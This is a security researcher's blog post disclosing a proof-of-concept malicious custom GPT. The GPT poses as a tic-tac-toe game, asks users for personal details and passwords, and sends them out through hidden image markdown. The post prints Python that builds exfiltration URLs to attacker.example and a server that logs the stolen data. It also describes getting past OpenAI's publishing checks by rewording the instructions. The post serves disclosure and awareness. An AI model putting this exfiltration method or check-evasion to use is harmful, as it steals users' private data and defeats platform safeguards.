Malicious ChatGPT Agents: How GPTs Can Quietly Grab Your Data (Demo)
When OpenAI released GPTs last month, I had an idea for an interesting GPT.
Malicious ChatGPT Agents
The idea was to create a kind of malware GPT that forwards users' chat messages to a third-party server and also asks users for personal information such as emails and passwords.
Why would this be possible end to end?
ChatGPT cannot guarantee that your conversation stays private or confidential, because it renders images loaded from arbitrary websites. This allows data to be sent to a third-party server.
A GPT can contain instructions that ask the user for information and simply send it elsewhere. I quickly built a proof-of-concept GPT to demonstrate this.
To make it fun, it pretends to be a GPT that wants to play tic-tac-toe with the user.
As you can see above, before starting to play it asks for some personal information "to ensure a good experience". Unfortunately, everything the user shares with this GPT is secretly sent to a third-party server by rendering a hidden image with the data appended to the URL.
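To illustrate the mechanics, here is a minimal sketch of the idea, not the actual GPT's instructions: the endpoint `attacker.example` and the `q` parameter are made up for the example. It shows roughly how chat data can be appended to an image URL so that rendering the markdown delivers the data to a third-party server:

```python
from urllib.parse import quote

# Hypothetical collection endpoint -- not the server used in the demo.
EXFIL_ENDPOINT = "https://attacker.example/pixel.png"

def build_exfil_markdown(user_message: str) -> str:
    """Return image markdown that smuggles the user's message to a
    third-party server via the image URL's query string."""
    payload = quote(user_message)
    # When the markdown is rendered, the client fetches the image URL,
    # which delivers the appended data to the server.
    return f"![]({EXFIL_ENDPOINT}?q={payload})"

print(build_exfil_markdown("name=Alice, email=alice@example.com"))
# -> ![](https://attacker.example/pixel.png?q=name%3DAlice%2C%20email%3Dalice%40example.com)
```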
And the server indeed receives the user’s data.
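On the receiving side nothing sophisticated is required. Below is a minimal sketch of such an endpoint (assuming the hypothetical `q` parameter from the snippet above and port 8080); it simply logs every incoming image request:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class ExfilLogger(BaseHTTPRequestHandler):
    """Answers image requests and logs whatever data was appended to the URL."""

    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        data = query.get("q", [""])[0]
        print(f"[exfil] {self.client_address[0]}: {data}")
        # Reply with an empty 200 so the image request "succeeds" silently.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ExfilLogger).serve_forever()
```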
Scary. Watch the video below to see if it also got the user’s password! :)
The final question was whether it could be made available to other ChatGPT users.
Publishing Thief GPT!
A newly created GPT is initially private and can only be used by its creator.
There are three publishing settings:
- Only me (private, default)
- Anyone with a link
- Public
This is how the UI looks for publishing a GPT:
When I first switched the setting to “Anyone with Link” or “Public”, I got this error:
OpenAI blocks the publishing of certain GPTs. The first version contained words such as "steal" and "malicious", and it apparently failed the "brand and usage" guidelines.
Updating Instructions
However, as suggested, modifying the GPT's definition to pass these checks was a quick fix. Changing just a few characters can sometimes be enough to bypass them. The checks appear to use an LLM to validate the instructions, so dubious instructions may pass by pure chance. Afterwards, the GPT was published for anyone to use!
There is a note that the GPT might appear in the GPT store (when making it fully public):
Automatic malware proliferation! Scary!
To prevent the GPT from showing up in the store, I changed the setting back to "Anyone with a link".
Demo Video
If you have read this far, I'm sure you want to see the demo:
Malicious agents can scam users, ask for personal information, and exfiltrate it.
This should be pretty alarming.
Disclosure
This GPT and its underlying instructions were promptly reported to OpenAI on November 13th, 2023. However, the ticket was closed on November 15th as "Not Applicable". Two follow-up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness.
The data exfiltration technique used by the GPT (rendering hidden image markdown) was first reported to OpenAI in early April 2023.
Conclusions
There are security vulnerabilities in ChatGPT, including GPTs, that remain unaddressed:
- GPTs can be designed as malicious agents that try to scam users
- GPTs can steal user data by exfiltrating it to external servers without the user's knowledge or consent
- Bypassing the current validation checks is trivial, allowing anyone to publish malicious GPTs to the world.
Because of the image markdown rendering vulnerability, OpenAI cannot guarantee the privacy and confidentiality of your ChatGPT conversations. This includes, but is not limited to, custom GPTs.
Bing Chat, Google Bard, Anthropic Claude and many others fixed such issues after being made aware of them. Let’s hope fixes get implemented, so we can safely enjoy using GPTs.
Chaos Communication Congress
I will be at the 37th Chaos Communication Congress in Hamburg speaking about security issues in LLM applications to raise awareness of emerging attack techniques and what can be done to mitigate them.
Come by and check out the talk, it’s called “NEW IMPORTANT INSTRUCTIONS”.
That’s it for today. Thanks for reading.
Appendix
Demo Screenshots
Here are some demo screenshots: